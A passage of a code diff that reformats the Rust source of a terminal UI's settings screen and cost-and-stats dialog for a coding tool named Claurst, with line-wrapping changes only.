-                if t > 0.0 { (t * 100.0).round() as u8 } else { 95 }
-            },
-        );
-        self.notifications_enabled = read_setting_bool(
-            &self.settings_snapshot,
-            "notifications",
-            true,
-        );
-        self.reduce_motion = read_setting_bool(
-            &self.settings_snapshot,
-            "reduceMotion",
-            false,
-        );
-        self.show_turn_duration = read_setting_bool(
-            &self.settings_snapshot,
-            "showTurnDuration",
-            false,
-        );
-        self.terminal_progress_bar = read_setting_bool(
-            &self.settings_snapshot,
-            "terminalProgressBar",
-            true,
-        );
+                if t > 0.0 {
+                    (t * 100.0).round() as u8
+                } else {
+                    95
+                }
+            });
+        self.notifications_enabled =
+            read_setting_bool(&self.settings_snapshot, "notifications", true);
+        self.reduce_motion = read_setting_bool(&self.settings_snapshot, "reduceMotion", false);
+        self.show_turn_duration =
+            read_setting_bool(&self.settings_snapshot, "showTurnDuration", false);
+        self.terminal_progress_bar =
+            read_setting_bool(&self.settings_snapshot, "terminalProgressBar", true);
     }
 
     pub fn close(&mut self) {
@@ -370,8 +361,12 @@ pub fn render_settings_screen(frame: &mut Frame, screen: &SettingsScreen, area: 
     render_dark_overlay(frame, area);
 
     // 80% width, 90% height, centred
-    let w = (area.width * 4 / 5).max(60).min(area.width.saturating_sub(2));
-    let h = (area.height * 9 / 10).max(20).min(area.height.saturating_sub(2));
+    let w = (area.width * 4 / 5)
+        .max(60)
+        .min(area.width.saturating_sub(2));
+    let h = (area.height * 9 / 10)
+        .max(20)
+        .min(area.height.saturating_sub(2));
     let popup = centered_rect(w, h, area);
     render_dialog_bg(frame, popup);
 
@@ -390,7 +385,12 @@ pub fn render_settings_screen(frame: &mut Frame, screen: &SettingsScreen, area: 
     // Split into header + tabs + content + footer
     let layout = Layout::default()
         .direction(Direction::Vertical)
-        .constraints([Constraint::Length(1), Constraint::Length(2), Constraint::Min(1), Constraint::Length(1)])
+        .constraints([
+            Constraint::Length(1),
+            Constraint::Length(2),
+            Constraint::Min(1),
+            Constraint::Length(1),
+        ])
         .split(inner);
 
     let header_area = layout[0];
@@ -399,14 +399,26 @@ pub fn render_settings_screen(frame: &mut Frame, screen: &SettingsScreen, area: 
     let footer_area = layout[3];
 
     let title = Line::from(vec![
-        Span::styled(" Settings", Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            " Settings",
+            Style::default()
+                .fg(CLAURST_ACCENT)
+                .add_modifier(Modifier::BOLD),
+        ),
         Span::styled(" — Claurst", Style::default().fg(CLAURST_MUTED)),
         Span::styled(
-            format!("{:>width$}", "Esc close", width = inner.width.saturating_sub(19) as usize),
+            format!(
+                "{:>width$}",
+                "Esc close",
+                width = inner.width.saturating_sub(19) as usize
+            ),
             Style::default().fg(CLAURST_MUTED),
         ),
     ]);
-    frame.render_widget(Paragraph::new(title).style(Style::default().bg(CLAURST_PANEL_BG)), header_area);
+    frame.render_widget(
+        Paragraph::new(title).style(Style::default().bg(CLAURST_PANEL_BG)),
+        header_area,
+    );
 
     // Tabs bar
     let tab_labels: Vec<Line> = SettingsTab::all()
@@ -440,20 +452,50 @@ pub fn render_settings_screen(frame: &mut Frame, screen: &SettingsScreen, area: 
     // Footer
     let footer = if screen.edit_field.is_some() {
         Line::from(vec![
-            Span::styled(" Enter ", Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                " Enter ",
+                Style::default()
+                    .fg(CLAURST_ACCENT)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::raw("save  "),
-            Span::styled(" Esc ", Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                " Esc ",
+                Style::default()
+                    .fg(Color::Yellow)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::raw("cancel"),
         ])
     } else {
         Line::from(vec![
-            Span::styled(" Tab ", Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                " Tab ",
+                Style::default()
+                    .fg(CLAURST_ACCENT)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::raw("next tab  "),
-            Span::styled(" ↑↓ ", Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                " ↑↓ ",
+                Style::default()
+                    .fg(CLAURST_ACCENT)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::raw("select  "),
-            Span::styled(" Space/Enter ", Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                " Space/Enter ",
+                Style::default()
+                    .fg(CLAURST_ACCENT)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::raw("toggle  "),
-            Span::styled(" Esc ", Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                " Esc ",
+                Style::default()
+                    .fg(Color::Yellow)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::raw("close"),
         ])
     };
@@ -495,9 +537,10 @@ fn build_general_lines(screen: &SettingsScreen) -> Vec<Line<'static>> {
     lines.push(Line::from(""));
 
     // Model
-    let model_val = cfg.model.clone().unwrap_or_else(|| {
-        claurst_core::constants::DEFAULT_MODEL.to_string()
-    });
+    let model_val = cfg
+        .model
+        .clone()
+        .unwrap_or_else(|| claurst_core::constants::DEFAULT_MODEL.to_string());
     lines.extend(field_lines(
         "model",
         "Model",
@@ -550,11 +593,16 @@ fn build_general_lines(screen: &SettingsScreen) -> Vec<Line<'static>> {
         .project_dir
         .as_ref()
         .map(|p| p.display().to_string())
-        .unwrap_or_else(|| std::env::current_dir()
-            .map(|p| p.display().to_string())
-            .unwrap_or_else(|_| "(unknown)".to_string()));
+        .unwrap_or_else(|| {
+            std::env::current_dir()
+                .map(|p| p.display().to_string())
+                .unwrap_or_else(|_| "(unknown)".to_string())
+        });
     lines.push(label_value_line("Working Directory", &wd));
-    lines.push(indent_line("  (Set via --project-dir flag)", Color::DarkGray));
+    lines.push(indent_line(
+        "  (Set via --project-dir flag)",
+        Color::DarkGray,
+    ));
     lines.push(Line::from(""));
 
     // --- Toggleable fields ---
@@ -566,7 +614,10 @@ fn build_general_lines(screen: &SettingsScreen) -> Vec<Line<'static>> {
     lines.extend(toggle_field_lines(
         screen.auto_compact_enabled,
         "Auto-compact",
-        &format!("Automatically compact at {}%", screen.auto_compact_threshold),
+        &format!(
+            "Automatically compact at {}%",
+            screen.auto_compact_threshold
+        ),
         screen.selected_field == 0,
     ));
 
@@ -609,7 +660,10 @@ fn build_display_lines(screen: &SettingsScreen) -> Vec<Line<'static>> {
         claurst_core::config::Theme::Custom(s) => s.as_str(),
     };
     lines.push(label_value_line("Theme", theme_name));
-    lines.push(indent_line("  Options: default, dark, light, deuteranopia  (use /theme to change)", Color::DarkGray));
+    lines.push(indent_line(
+        "  Options: default, dark, light, deuteranopia  (use /theme to change)",
+        Color::DarkGray,
+    ));
     lines.push(Line::from(""));
 
     // Output format
@@ -619,13 +673,19 @@ fn build_display_lines(screen: &SettingsScreen) -> Vec<Line<'static>> {
         claurst_core::config::OutputFormat::StreamJson => "stream-json",
     };
     lines.push(label_value_line("Output Format", fmt));
-    lines.push(indent_line("  Options: text, json, stream-json", Color::DarkGray));
+    lines.push(indent_line(
+        "  Options: text, json, stream-json",
+        Color::DarkGray,
+    ));
     lines.push(Line::from(""));
 
     // Verbose
     let verbose = if cfg.verbose { "yes" } else { "no" };
     lines.push(label_value_line("Verbose Mode", verbose));
-    lines.push(indent_line("  Shows additional debug information during queries.", Color::DarkGray));
+    lines.push(indent_line(
+        "  Shows additional debug information during queries.",
+        Color::DarkGray,
+    ));
     lines.push(Line::from(""));
 
     // --- Toggleable fields ---
@@ -661,9 +721,16 @@ fn build_display_lines(screen: &SettingsScreen) -> Vec<Line<'static>> {
                 format!("{}  {:<15}", marker, style.name),
                 Style::default()
                     .fg(if active { CLAURST_ACCENT } else { CLAURST_TEXT })
-                    .add_modifier(if active { Modifier::BOLD } else { Modifier::empty() }),
+                    .add_modifier(if active {
+                        Modifier::BOLD
+                    } else {
+                        Modifier::empty()
+                    }),
             ),
-            Span::styled(style.description.clone(), Style::default().fg(Color::DarkGray)),
+            Span::styled(
+                style.description.clone(),
+                Style::default().fg(Color::DarkGray),
+            ),
         ]));
     }
     lines.push(Line::from(""));
@@ -691,8 +758,12 @@ impl PrivacySnapshot {
     /// Load privacy fields from `~/.claurst/settings.json`.
     fn load() -> Self {
         let path = claurst_core::config::Settings::config_dir().join("settings.json");
-        let Ok(content) = std::fs::read_to_string(&path) else { return Self::default(); };
-        let Ok(json) = serde_json::from_str::<serde_json::Value>(&content) else { return Self::default(); };
+        let Ok(content) = std::fs::read_to_string(&path) else {
+            return Self::default();
+        };
+        let Ok(json) = serde_json::from_str::<serde_json::Value>(&content) else {
+            return Self::default();
+        };
         Self {
             has_agreed: json.get("hasAgreedToUsagePolicy").and_then(|v| v.as_bool()),
             disable_telemetry: json.get("disableTelemetry").and_then(|v| v.as_bool()),
@@ -731,14 +802,23 @@ fn build_privacy_lines(screen: &SettingsScreen) -> Vec<Line<'static>> {
     lines.push(Line::from(vec![
         Span::styled(
             format!("  {:<25}", "Usage Policy"),
-            Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             agreed_label.to_string(),
-            Style::default().fg(if privacy.has_agreed == Some(true) { Color::Green } else { Color::Yellow }),
+            Style::default().fg(if privacy.has_agreed == Some(true) {
+                Color::Green
+            } else {
+                Color::Yellow
+            }),
         ),
     ]));
-    lines.push(indent_line("  Whether you have agreed to Anthropic's usage policy.", Color::DarkGray));
+    lines.push(indent_line(
+        "  Whether you have agreed to Anthropic's usage policy.",
+        Color::DarkGray,
+    ));
     lines.push(Line::from(""));
 
     // Telemetry
@@ -768,7 +848,9 @@ fn build_privacy_lines(screen: &SettingsScreen) -> Vec<Line<'static>> {
     lines.push(Line::from(""));
     lines.push(Line::from(vec![Span::styled(
         "  Note: Edit ~/.claurst/settings.json to toggle telemetry/sharing values.",
-        Style::default().fg(Color::Yellow).add_modifier(Modifier::ITALIC),
+        Style::default()
+            .fg(Color::Yellow)
+            .add_modifier(Modifier::ITALIC),
     )]));
     lines.push(Line::from(""));
     lines.push(Line::from(vec![Span::styled(
@@ -788,7 +870,9 @@ fn privacy_toggle_lines(lines: &mut Vec<Line<'static>>, name: &str, enabled: boo
     lines.push(Line::from(vec![
         Span::styled(
             format!("  {:<25}", name),
-            Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             format!("[{}]", toggle_text),
@@ -833,11 +917,17 @@ fn build_advanced_lines(screen: &SettingsScreen) -> Vec<Line<'static>> {
         lines.push(indent_line("  (none configured)", Color::DarkGray));
     } else {
         for srv in &cfg.mcp_servers {
-            let kind = if srv.url.is_some() { "http" } else { &srv.server_type };
+            let kind = if srv.url.is_some() {
+                "http"
+            } else {
+                &srv.server_type
+            };
             lines.push(Line::from(vec![
                 Span::styled(
                     format!("  {:<20}", srv.name),
-                    Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(CLAURST_ACCENT)
+                        .add_modifier(Modifier::BOLD),
                 ),
                 Span::styled(format!("[{}]", kind), Style::default().fg(Color::DarkGray)),
             ]));
@@ -869,12 +959,17 @@ fn build_advanced_lines(screen: &SettingsScreen) -> Vec<Line<'static>> {
                 lines.push(Line::from(vec![
                     Span::styled(
                         format!("  {:<20}", event_name),
-                        Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+                        Style::default()
+                            .fg(Color::Yellow)
+                            .add_modifier(Modifier::BOLD),
                     ),
                     Span::styled(filter, Style::default().fg(CLAURST_ACCENT)),
                     Span::styled(blocking.to_string(), Style::default().fg(Color::Red)),
                 ]));
-                lines.push(indent_line(&format!("    cmd: {}", entry.command), Color::DarkGray));
+                lines.push(indent_line(
+                    &format!("    cmd: {}", entry.command),
+                    Color::DarkGray,
+                ));
             }
         }
     }
@@ -890,7 +985,9 @@ fn build_advanced_lines(screen: &SettingsScreen) -> Vec<Line<'static>> {
             lines.push(Line::from(vec![
                 Span::styled(
                     format!("  {:<25}", key),
-                    Style::default().fg(Color::Green).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Green)
+                        .add_modifier(Modifier::BOLD),
                 ),
                 Span::styled("= ***".to_string(), Style::default().fg(Color::DarkGray)),
             ]));
@@ -912,7 +1009,9 @@ fn build_keybindings_lines(_screen: &SettingsScreen) -> Vec<Line<'static>> {
     lines.push(Line::from(""));
     lines.push(Line::from(vec![Span::styled(
         "  Edit ~/.claurst/keybindings.json to customise bindings.",
-        Style::default().fg(Color::Yellow).add_modifier(Modifier::ITALIC),
+        Style::default()
+            .fg(Color::Yellow)
+            .add_modifier(Modifier::ITALIC),
     )]));
     lines.push(Line::from(""));
 
@@ -928,9 +1027,15 @@ fn build_keybindings_lines(_screen: &SettingsScreen) -> Vec<Line<'static>> {
                 .iter()
                 .map(|ks| {
                     let mut parts = Vec::new();
-                    if ks.ctrl { parts.push("Ctrl"); }
-                    if ks.alt { parts.push("Alt"); }
-                    if ks.shift { parts.push("Shift"); }
+                    if ks.ctrl {
+                        parts.push("Ctrl");
+                    }
+                    if ks.alt {
+                        parts.push("Alt");
+                    }
+                    if ks.shift {
+                        parts.push("Shift");
+                    }
                     parts.push(ks.key.as_str());
                     parts.join("+")
                 })
@@ -997,7 +1102,9 @@ fn label_value_line(label: &str, value: &str) -> Line<'static> {
     Line::from(vec![
         Span::styled(
             format!("  {:<25}", label),
-            Style::default().fg(CLAURST_TEXT).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(CLAURST_TEXT)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(value.to_string(), Style::default().fg(CLAURST_ACCENT)),
     ])
@@ -1040,17 +1147,25 @@ fn toggle_field_lines(
         Span::styled(
             format!("  [{}] {:<26}", check_char, label),
             if selected {
-                row_style.fg(Color::Black).bg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)
+                row_style
+                    .fg(Color::Black)
+                    .bg(CLAURST_ACCENT)
+                    .add_modifier(Modifier::BOLD)
             } else {
                 Style::default()
-                    .fg(if enabled { CLAURST_TEXT } else { Color::DarkGray })
-                    .add_modifier(if enabled { Modifier::BOLD } else { Modifier::empty() })
+                    .fg(if enabled {
+                        CLAURST_TEXT
+                    } else {
+                        Color::DarkGray
+                    })
+                    .add_modifier(if enabled {
+                        Modifier::BOLD
+                    } else {
+                        Modifier::empty()
+                    })
             },
         ),
-        Span::styled(
-            check_char.to_string(),
-            Style::default().fg(check_color),
-        ),
+        Span::styled(check_char.to_string(), Style::default().fg(check_color)),
         // Overwrite the duplicated check_char — we embedded it above; use the
         // description as the right-hand column instead.
         Span::styled(
@@ -1074,8 +1189,16 @@ fn toggle_field_lines(
                     .add_modifier(Modifier::BOLD)
             } else {
                 Style::default()
-                    .fg(if enabled { CLAURST_TEXT } else { Color::DarkGray })
-                    .add_modifier(if enabled { Modifier::BOLD } else { Modifier::empty() })
+                    .fg(if enabled {
+                        CLAURST_TEXT
+                    } else {
+                        Color::DarkGray
+                    })
+                    .add_modifier(if enabled {
+                        Modifier::BOLD
+                    } else {
+                        Modifier::empty()
+                    })
             },
         ),
         Span::styled(
@@ -1129,7 +1252,9 @@ fn field_lines(
         Line::from(vec![
             Span::styled(
                 format!("  {:<25}", label),
-                Style::default().fg(CLAURST_TEXT).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(CLAURST_TEXT)
+                    .add_modifier(Modifier::BOLD),
             ),
             Span::styled(display_value, Style::default().fg(value_color)),
             Span::styled(
@@ -1230,9 +1355,10 @@ pub fn handle_settings_key(
                 match &screen.active_tab {
                     SettingsTab::General => {
                         let cfg = &screen.settings_snapshot.config;
-                        let model_val = cfg.model.clone().unwrap_or_else(|| {
-                            claurst_core::constants::DEFAULT_MODEL.to_string()
-                        });
+                        let model_val = cfg
+                            .model
+                            .clone()
+                            .unwrap_or_else(|| claurst_core::constants::DEFAULT_MODEL.to_string());
                         screen.start_edit("model", &model_val);
                     }
                     _ => {}
@@ -1311,7 +1437,10 @@ mod tests {
         assert!(screen.notifications_enabled, "notifications default on");
         assert!(!screen.reduce_motion, "reduce_motion default off");
         assert!(!screen.show_turn_duration, "show_turn_duration default off");
-        assert!(screen.terminal_progress_bar, "terminal_progress_bar default on");
+        assert!(
+            screen.terminal_progress_bar,
+            "terminal_progress_bar default on"
+        );
     }
 
     #[test]
@@ -1339,8 +1468,7 @@ mod tests {
         let before = screen.auto_compact_enabled;
         toggle_current_field(&mut screen, &mut config);
         assert_eq!(
-            screen.auto_compact_enabled,
-            !before,
+            screen.auto_compact_enabled, !before,
             "auto_compact_enabled should have flipped"
         );
         // Toggle back
@@ -1438,7 +1566,10 @@ mod tests {
             .flat_map(|l| l.spans.iter())
             .map(|s| s.content.as_ref())
             .collect();
-        assert!(text.contains("Reduce motion"), "Display tab should have Reduce motion row");
+        assert!(
+            text.contains("Reduce motion"),
+            "Display tab should have Reduce motion row"
+        );
         assert!(
             text.contains("Terminal progress bar"),
             "Display tab should have Terminal progress bar row"

--- a/src-rust/crates/tui/src/stats_dialog.rs
+++ b/src-rust/crates/tui/src/stats_dialog.rs
@@ -14,8 +14,8 @@ use serde::{Deserialize, Serialize};
 use std::collections::HashMap;
 
 use crate::overlays::{
-    begin_modal_buf, modal_header_line_area, render_modal_title_buf, CLAURST_ACCENT,
-    CLAURST_MUTED, CLAURST_PANEL_BG,
+    begin_modal_buf, modal_header_line_area, render_modal_title_buf, CLAURST_ACCENT, CLAURST_MUTED,
+    CLAURST_PANEL_BG,
 };
 
 // ---------------------------------------------------------------------------
@@ -89,7 +89,9 @@ pub fn load_stats() -> AggregatedStats {
     let mut daily: HashMap<String, u64> = HashMap::new();
 
     for line in content.lines() {
-        let Ok(entry) = serde_json::from_str::<StatsEntry>(line) else { continue };
+        let Ok(entry) = serde_json::from_str::<StatsEntry>(line) else {
+            continue;
+        };
 
         let total_tokens = entry.input_tokens + entry.output_tokens;
         agg.total_input_tokens += entry.input_tokens;
@@ -165,7 +167,7 @@ pub enum StatsTab {
 pub struct StatsDialogState {
     pub open: bool,
     pub tab: StatsTab,
-    pub range_days: u32,  // 7, 30, or 0 = all
+    pub range_days: u32, // 7, 30, or 0 = all
     pub data: Option<AggregatedStats>,
     pub scroll: u16,
     /// Per-model breakdown for the Models tab (cost in USD).
@@ -201,24 +203,26 @@ impl StatsDialogState {
         self.scroll = 0;
     }
 
-    pub fn close(&mut self) { self.open = false; }
+    pub fn close(&mut self) {
+        self.open = false;
+    }
 
     pub fn next_tab(&mut self) {
         self.tab = match self.tab {
-            StatsTab::Overview    => StatsTab::DailyTokens,
+            StatsTab::Overview => StatsTab::DailyTokens,
             StatsTab::DailyTokens => StatsTab::CostHeatmap,
             StatsTab::CostHeatmap => StatsTab::Models,
-            StatsTab::Models      => StatsTab::Overview,
+            StatsTab::Models => StatsTab::Overview,
         };
         self.scroll = 0;
     }
 
     pub fn prev_tab(&mut self) {
         self.tab = match self.tab {
-            StatsTab::Overview    => StatsTab::Models,
+            StatsTab::Overview => StatsTab::Models,
             StatsTab::DailyTokens => StatsTab::Overview,
             StatsTab::CostHeatmap => StatsTab::DailyTokens,
-            StatsTab::Models      => StatsTab::CostHeatmap,
+            StatsTab::Models => StatsTab::CostHeatmap,
         };
         self.scroll = 0;
     }
@@ -234,7 +238,11 @@ impl StatsDialogState {
     /// Record usage for a model, accumulating into `model_breakdown`.
     /// `cost` is in USD (not cents).
     pub fn add_model_usage(&mut self, model_id: &str, input: u64, output: u64, cost: f64) {
-        if let Some(entry) = self.model_breakdown.iter_mut().find(|e| e.model_id == model_id) {
+        if let Some(entry) = self
+            .model_breakdown
+            .iter_mut()
+            .find(|e| e.model_id == model_id)
+        {
             entry.input_tokens += input;
             entry.output_tokens += output;
             entry.cost_usd += cost;
@@ -250,7 +258,9 @@ impl StatsDialogState {
 }
 
 impl Default for StatsDialogState {
-    fn default() -> Self { Self::new() }
+    fn default() -> Self {
+        Self::new()
+    }
 }
 
 // ---------------------------------------------------------------------------
@@ -268,7 +278,11 @@ fn build_model_breakdown(stats: &AggregatedStats) -> Vec<ModelBreakdown> {
             cost_usd: ms.cost_cents / 100.0,
         })
         .collect();
-    breakdown.sort_by(|a, b| b.cost_usd.partial_cmp(&a.cost_usd).unwrap_or(std::cmp::Ordering::Equal));
+    breakdown.sort_by(|a, b| {
+        b.cost_usd
+            .partial_cmp(&a.cost_usd)
+            .unwrap_or(std::cmp::Ordering::Equal)
+    });
     breakdown
 }
 
@@ -325,13 +339,19 @@ fn consecutive_dates(prev: &str, next: &str) -> bool {
 
 fn date_to_days_since_epoch(date: &str) -> Option<u64> {
     // Expect "YYYY-MM-DD"
-    if date.len() != 10 { return None; }
+    if date.len() != 10 {
+        return None;
+    }
     let year: u64 = date[0..4].parse().ok()?;
     let month: u64 = date[5..7].parse().ok()?;
     let day: u64 = date[8..10].parse().ok()?;
     // Days from 1970-01-01 (approximate, good enough for streak detection)
     let y = year - 1970;
-    let leap_days = if y > 0 { (y - 1) / 4 - (y - 1) / 100 + (y - 1) / 400 + 1 } else { 0 };
+    let leap_days = if y > 0 {
+        (y - 1) / 4 - (y - 1) / 100 + (y - 1) / 400 + 1
+    } else {
+        0
+    };
     let days_in_years = y * 365 + leap_days;
     let leap = is_leap_year(year as u32);
     let months = if leap {
@@ -349,19 +369,21 @@ fn date_to_days_since_epoch(date: &str) -> Option<u64> {
 
 /// Render the stats dialog overlay.
 pub fn render_stats_dialog(state: &StatsDialogState, area: Rect, buf: &mut Buffer) {
-    if !state.open { return; }
+    if !state.open {
+        return;
+    }
 
     let layout = begin_modal_buf(buf, area, 92, 30, 2, 1);
     render_modal_title_buf(buf, layout.header_area, "Cost & stats", "esc");
 
     let tab_line = Line::from(vec![
-        tab_span("Overview",      state.tab == StatsTab::Overview),
+        tab_span("Overview", state.tab == StatsTab::Overview),
         Span::styled("  ·  ", Style::default().fg(CLAURST_MUTED)),
-        tab_span("Daily Tokens",  state.tab == StatsTab::DailyTokens),
+        tab_span("Daily Tokens", state.tab == StatsTab::DailyTokens),
         Span::styled("  ·  ", Style::default().fg(CLAURST_MUTED)),
-        tab_span("Cost Heatmap",  state.tab == StatsTab::CostHeatmap),
+        tab_span("Cost Heatmap", state.tab == StatsTab::CostHeatmap),
         Span::styled("  ·  ", Style::default().fg(CLAURST_MUTED)),
-        tab_span("Models",        state.tab == StatsTab::Models),
+        tab_span("Models", state.tab == StatsTab::Models),
     ]);
     if let Some(tab_area) = modal_header_line_area(layout.header_area, 1) {
         Paragraph::new(tab_line).render(tab_area, buf);
@@ -377,14 +399,16 @@ pub fn render_stats_dialog(state: &StatsDialogState, area: Rect, buf: &mut Buffe
     };
 
     match state.tab {
-        StatsTab::Overview    => render_overview(data, state, content_area, buf),
+        StatsTab::Overview => render_overview(data, state, content_area, buf),
         StatsTab::DailyTokens => render_daily_tokens(data, state.range_days, content_area, buf),
         StatsTab::CostHeatmap => render_cost_heatmap(data, content_area, buf),
-        StatsTab::Models      => render_models(state, content_area, buf),
+        StatsTab::Models => render_models(state, content_area, buf),
     }
     Paragraph::new(Line::from(vec![Span::styled(
         " tab/←/→ switch tabs  ·  r cycle range  ·  ↑↓ scroll",
-        Style::default().fg(CLAURST_MUTED).add_modifier(Modifier::ITALIC),
+        Style::default()
+            .fg(CLAURST_MUTED)
+            .add_modifier(Modifier::ITALIC),
     )]))
     .render(layout.footer_area, buf);
 }
@@ -412,7 +436,12 @@ fn render_overview(data: &AggregatedStats, state: &StatsDialogState, area: Rect,
 
     lines.push(Line::from(vec![
         Span::styled("Total tokens: ", Style::default().fg(Color::DarkGray)),
-        Span::styled(format_tokens(total_tokens), Style::default().fg(Color::White).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            format_tokens(total_tokens),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
+        ),
     ]));
     lines.push(Line::from(vec![
         Span::styled("  Input:    ", Style::default().fg(Color::DarkGray)),
@@ -425,7 +454,12 @@ fn render_overview(data: &AggregatedStats, state: &StatsDialogState, area: Rect,
     lines.push(Line::default());
     lines.push(Line::from(vec![
         Span::styled("Total cost: ", Style::default().fg(Color::DarkGray)),
-        Span::styled(format!("${:.2}", data.total_cost_cents / 100.0), Style::default().fg(Color::White).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            format!("${:.2}", data.total_cost_cents / 100.0),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
+        ),
     ]));
 
     // Streak display
@@ -435,10 +469,16 @@ fn render_overview(data: &AggregatedStats, state: &StatsDialogState, area: Rect,
         let longest = state.longest_streak_days;
         let streak_value = Span::styled(
             format!("● {} day{}", current, if current == 1 { "" } else { "s" }),
-            Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::Yellow)
+                .add_modifier(Modifier::BOLD),
         );
         let streak_longest = Span::styled(
-            format!("  (longest: {} day{})", longest, if longest == 1 { "" } else { "s" }),
+            format!(
+                "  (longest: {} day{})",
+                longest,
+                if longest == 1 { "" } else { "s" }
+            ),
             Style::default().fg(Color::DarkGray),
         );
         lines.push(Line::from(vec![
@@ -452,20 +492,40 @@ fn render_overview(data: &AggregatedStats, state: &StatsDialogState, area: Rect,
         lines.push(Line::default());
         lines.push(Line::from(vec![
             Span::styled("Peak day: ", Style::default().fg(Color::DarkGray)),
-            Span::styled(format!("{} ({} tokens)", peak, format_tokens(data.peak_day_tokens)), Style::default().fg(Color::Yellow)),
+            Span::styled(
+                format!("{} ({} tokens)", peak, format_tokens(data.peak_day_tokens)),
+                Style::default().fg(Color::Yellow),
+            ),
         ]));
     }
 
     if !data.by_model.is_empty() {
         lines.push(Line::default());
-        lines.push(Line::from(vec![Span::styled("By model:", Style::default().fg(Color::DarkGray))]));
+        lines.push(Line::from(vec![Span::styled(
+            "By model:",
+            Style::default().fg(Color::DarkGray),
+        )]));
         let mut models: Vec<_> = data.by_model.iter().collect();
-        models.sort_by(|a, b| b.1.cost_cents.partial_cmp(&a.1.cost_cents).unwrap_or(std::cmp::Ordering::Equal));
+        models.sort_by(|a, b| {
+            b.1.cost_cents
+                .partial_cmp(&a.1.cost_cents)
+                .unwrap_or(std::cmp::Ordering::Equal)
+        });
         for (model, stats) in models.iter().take(5) {
             lines.push(Line::from(vec![
                 Span::styled(format!("  {:40} ", model), Style::default().fg(Color::Cyan)),
-                Span::styled(format!("{} turns  {}", stats.turns, format_tokens(stats.input_tokens + stats.output_tokens)), Style::default().fg(Color::White)),
-                Span::styled(format!("  ${:.2}", stats.cost_cents / 100.0), Style::default().fg(Color::DarkGray)),
+                Span::styled(
+                    format!(
+                        "{} turns  {}",
+                        stats.turns,
+                        format_tokens(stats.input_tokens + stats.output_tokens)
+                    ),
+                    Style::default().fg(Color::White),
+                ),
+                Span::styled(
+                    format!("  ${:.2}", stats.cost_cents / 100.0),
+                    Style::default().fg(Color::DarkGray),
+                ),
             ]));
         }
     }
@@ -482,11 +542,20 @@ fn render_daily_tokens(data: &AggregatedStats, range_days: u32, area: Rect, buf:
     let filtered: Vec<_> = if range_days == 0 {
         data.daily_tokens.iter().collect()
     } else {
-        data.daily_tokens.iter().rev().take(range_days as usize).collect::<Vec<_>>().into_iter().rev().collect()
+        data.daily_tokens
+            .iter()
+            .rev()
+            .take(range_days as usize)
+            .collect::<Vec<_>>()
+            .into_iter()
+            .rev()
+            .collect()
     };
 
     if filtered.is_empty() {
-        Paragraph::new("No data yet.").style(Style::default().fg(Color::DarkGray)).render(area, buf);
+        Paragraph::new("No data yet.")
+            .style(Style::default().fg(Color::DarkGray))
+            .render(area, buf);
         return;
     }
 
@@ -495,22 +564,37 @@ fn render_daily_tokens(data: &AggregatedStats, range_days: u32, area: Rect, buf:
         30 => "30 days",
         _ => "all time",
     };
-    let label_line = Line::from(vec![
-        Span::styled(format!("Range: {} [r: cycle]", range_label), Style::default().fg(Color::DarkGray)),
-    ]);
+    let label_line = Line::from(vec![Span::styled(
+        format!("Range: {} [r: cycle]", range_label),
+        Style::default().fg(Color::DarkGray),
+    )]);
     Paragraph::new(label_line).render(
-        Rect { x: area.x, y: area.y, width: area.width, height: 1 },
+        Rect {
+            x: area.x,
+            y: area.y,
+            width: area.width,
+            height: 1,
+        },
         buf,
     );
 
-    let chart_area = Rect { x: area.x, y: area.y + 2, width: area.width, height: area.height.saturating_sub(2) };
+    let chart_area = Rect {
+        x: area.x,
+        y: area.y + 2,
+        width: area.width,
+        height: area.height.saturating_sub(2),
+    };
 
     // Build bar chart data
     let max_val = filtered.iter().map(|d| d.1).max().unwrap_or(1).max(1);
     let bar_data: Vec<(&str, u64)> = filtered
         .iter()
         .map(|d| {
-            let label: &str = if d.0.len() >= 5 { &d.0[5..] } else { d.0.as_str() };
+            let label: &str = if d.0.len() >= 5 {
+                &d.0[5..]
+            } else {
+                d.0.as_str()
+            };
             (label, d.1 * (chart_area.height as u64 - 1) / max_val)
         })
         .collect();
@@ -518,7 +602,9 @@ fn render_daily_tokens(data: &AggregatedStats, range_days: u32, area: Rect, buf:
     // Render ASCII bar chart manually (ratatui BarChart needs 'static strs)
     for (i, (label, height)) in bar_data.iter().enumerate() {
         let x = chart_area.x + i as u16 * 6;
-        if x + 5 >= chart_area.x + chart_area.width { break; }
+        if x + 5 >= chart_area.x + chart_area.width {
+            break;
+        }
         let bar_height = (*height as u16).min(chart_area.height.saturating_sub(1));
         for row in 0..bar_height {
